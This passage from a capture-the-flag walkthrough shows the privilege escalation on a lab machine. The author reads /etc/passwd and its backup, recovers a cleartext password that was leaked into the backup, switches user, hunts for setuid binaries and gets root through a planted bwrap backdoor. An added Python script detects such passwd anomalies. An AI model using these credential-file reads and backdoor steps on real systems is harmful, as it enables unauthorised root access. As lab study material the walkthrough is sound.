Continue with privilege escalation. Changing into /home shows a second user, joe, so without wasting time go through /etc/passwd:

mike@inplainsight:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike,,,:/home/mike:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:112:120::/var/spool/postfix:/usr/sbin/nologin
ftp:x:113:122:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
joe:x:1001:1001:hyphens rule:/home/joe:/bin/bash

No password for joe there, but two details are worth noting: joe's GECOS field reads "hyphens rule", which looks like a hint, and /etc/passwd- is the backup copy that the passwd tools (vipw, useradd, chpasswd) leave behind. Read it too:

mike@inplainsight:/etc$ cat passwd-
cat passwd-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike,,,:/home/mike:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:112:120::/var/spool/postfix:/usr/sbin/nologin
ftp:x:113:122:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
joe:x:1001:1001:joe:SmashMouthNoThanks:/home/joe:/bin/bash

The backup line for joe has eight colon-separated fields instead of seven: an extra value was stuffed in after the GECOS field, and it is a cleartext password. So joe/SmashMouthNoThanks; switch to joe:
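That kind of leak is easy to catch mechanically. The following is an added example (not from the walkthrough) that parses passwd-format text, flags entries whose field count is not seven, reports which users differ between the live file and the backup, and lists the interactive accounts worth trying su against. The sample text is constructed from the lines of the two files shown above, trimmed to the relevant users.

```python
"""Spot malformed or divergent entries between /etc/passwd and its
/etc/passwd- backup. Added example; the sample data is constructed from the
walkthrough's two listings, reduced to the lines that matter."""

PASSWD_FIELDS = 7  # name:passwd:uid:gid:gecos:home:shell

# Constructed sample: live file.
PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
mike:x:1000:1000:mike,,,:/home/mike:/bin/bash
joe:x:1001:1001:hyphens rule:/home/joe:/bin/bash
"""

# Constructed sample: backup file, with the extra field on joe's line.
PASSWD_BACKUP = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
mike:x:1000:1000:mike,,,:/home/mike:/bin/bash
joe:x:1001:1001:joe:SmashMouthNoThanks:/home/joe:/bin/bash
"""


def parse_passwd(text):
    """Return {username: fields}; malformed lines are kept, not dropped,
    because the malformation is the finding."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def malformed_entries(text):
    """(user, field_count) for every line that is not exactly 7 fields.
    Extra colons mean extra data was stuffed into the record."""
    return [(f[0], len(f)) for f in parse_passwd(text).values()
            if len(f) != PASSWD_FIELDS]


def diverging_entries(current, backup):
    """Users whose record differs between the live file and the backup."""
    cur, bak = parse_passwd(current), parse_passwd(backup)
    return [(u, cur.get(u), bak.get(u))
            for u in sorted(set(cur) | set(bak))
            if cur.get(u) != bak.get(u)]


def interactive_users(text):
    """Accounts with uid >= 1000 and a real login shell: the su targets."""
    return [f[0] for f in parse_passwd(text).values()
            if f[2].isdigit() and int(f[2]) >= 1000
            and not f[-1].endswith(("nologin", "false"))]


if __name__ == "__main__":
    print("malformed in backup:", malformed_entries(PASSWD_BACKUP))
    for user, live, old in diverging_entries(PASSWD, PASSWD_BACKUP):
        print(f"{user}: live={live} backup={old}")
    print("interactive:", interactive_users(PASSWD))
```

On a real box, read both files from disk and run the same three functions; a field-count mismatch or a diverging entry in the backup is worth a look every time.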

mike@inplainsight:/etc$ su joe
su joe
Password: SmashMouthNoThanks

joe@inplainsight:/etc$ id
id
uid=1001(joe) gid=1001(joe) groups=1001(joe)
joe@inplainsight:/etc$ whoami
whoami
joe
joe@inplainsight:/$ cd /home
cd /home
joe@inplainsight:/home$ ls
ls
joe mike
joe@inplainsight:/home$ cd joe
cd joe
joe@inplainsight:~$ ls
ls
journal
joe@inplainsight:~$ cat journal
cat journal
glad i added that root backdoor before boss person removed my privileges :)

Joe's journal says a root backdoor was planted before his privileges were removed, so all that remains is to find it and read the final flag. Start by listing setuid binaries with find:

find / -perm -u=s -type f 2>/dev/null

find searches from / regardless of the current directory. Running it as joe lists the following; nearly everything is a stock Ubuntu setuid binary, but /usr/bin/bwrap (bubblewrap, a sandboxing helper) is the odd one out, and the todo.txt already told us joe leaves backdoors:

joe@inplainsight:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/bwrap
/usr/bin/mount
/usr/bin/at
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine

Running bwrap drops straight into a root shell, which a genuine bubblewrap would never do: the binary has been replaced. Note that id still lists 1001(joe) among the groups, which suggests the backdoor set uid and gid 0 without clearing the caller's supplementary groups. The final flag is in /root:

joe@inplainsight:~$ bwrap
bwrap
root@inplainsight:~# id
id
uid=0(root) gid=0(root) groups=0(root),1001(joe)
root@inplainsight:~# whoami
whoami
root
root@inplainsight:~# cd /root
cd /root
root@inplainsight:/root# ls
ls
flag.txt
root@inplainsight:/root# cat flag.txt
cat flag.txt

__
____ ____ ____ ________________ _/ |_ ______
_/ ___\/ _ \ / \ / ___\_ __ \__ \\ __\/ ___/
\ \__( <_> ) | \/ /_/ > | \// __ \| | \___ \
\___ >____/|___| /\___ /|__| (____ /__| /____ >
\/ \//_____/ \/ \/

easy right? thanks for playing.

feel free to leave feedback with me @bzyo_

Privilege escalation done, slick.

  • Key points: WordPress plugin upload as admin, credential reuse between wp-config.php, the database and system accounts, a leftover /etc/passwd- backup, and a setuid backdoor.

Game over

Sorry, this time I still didn't find that Greek expert's one-click walkthrough script. I am so sorry about this... It's a pity...

The end, to be continued...